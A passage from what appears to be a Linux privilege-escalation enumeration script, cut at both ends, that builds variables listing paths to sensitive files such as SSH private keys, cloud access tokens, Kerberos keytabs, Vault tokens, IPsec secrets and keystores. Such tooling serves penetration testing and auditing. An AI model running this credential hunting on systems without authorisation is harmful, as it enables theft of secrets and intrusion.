"$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_WIFI_CONNECTIONS=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/etc" | grep -E "system-connections$" | sort | uniq | head -n 70) - PSTORAGE_PAM_AUTH=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/etc" | grep -E "pam\.d$" | sort | uniq | head -n 70) - PSTORAGE_NFS_EXPORTS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/etc" | grep -E "exports$" | sort | uniq | head -n 70) - PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) - PSTORAGE_RACOON=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70) - PSTORAGE_KUBELET=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var" | grep -E "kubelet$|kube-proxy$" | sort | uniq | head -n 70) - PSTORAGE_VNC=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN\n$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) - PSTORAGE_LDAP=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "ldap$" | sort | uniq | head -n 70) - PSTORAGE_LOG4SHELL=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/etc|^/private|^/usr|^/mnt|^/applications|^/cdrom|^/tmp|^/media|^/lib|^/sbin|^/var|^/bin|^$GREPHOMESEARCH|^/opt|^/.cache|^/lib64|^/snap|^/lib32|^/srv" | grep -E "log4j-core.*\.jar$" | sort | uniq | head -n 70) - PSTORAGE_OPENVPN=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) - PSTORAGE_SSH=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70) - PSTORAGE_CERTSB4=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) - PSTORAGE_CERTSBIN=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) - PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) - PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/private|^/tmp" | grep -E "agent.*$" | sort | uniq | head -n 70) - PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^$GREPHOMESEARCH|^/usr" | grep -E "ssh.*config$" | sort | uniq | head -n 70) - PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN\n$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70) - PSTORAGE_KERBEROS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$|secrets\.ldb$|\.secrets\.mkey$|sssd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_KIBANA=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) - PSTORAGE_KNOCKD=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) - PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "logstash$" | sort | uniq | head -n 70) - PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) - PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) - PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.vault-token$" | sort | uniq | head -n 70) - PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "couchdb$" | sort | uniq | head -n 70) - PSTORAGE_REDIS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "redis\.conf$" | sort | uniq | head -n 70) - PSTORAGE_MOSQUITTO=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) - PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "neo4j$" | sort | uniq | head -n 70) - PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) - PSTORAGE_ERLANG=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) - PSTORAGE_GMV_AUTH=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) - PSTORAGE_IPSEC=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) - PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.irssi$" | sort | uniq | head -n 70) - PSTORAGE_KEYRING=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN\n$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) - PSTORAGE_FILEZILLA=$(echo -e 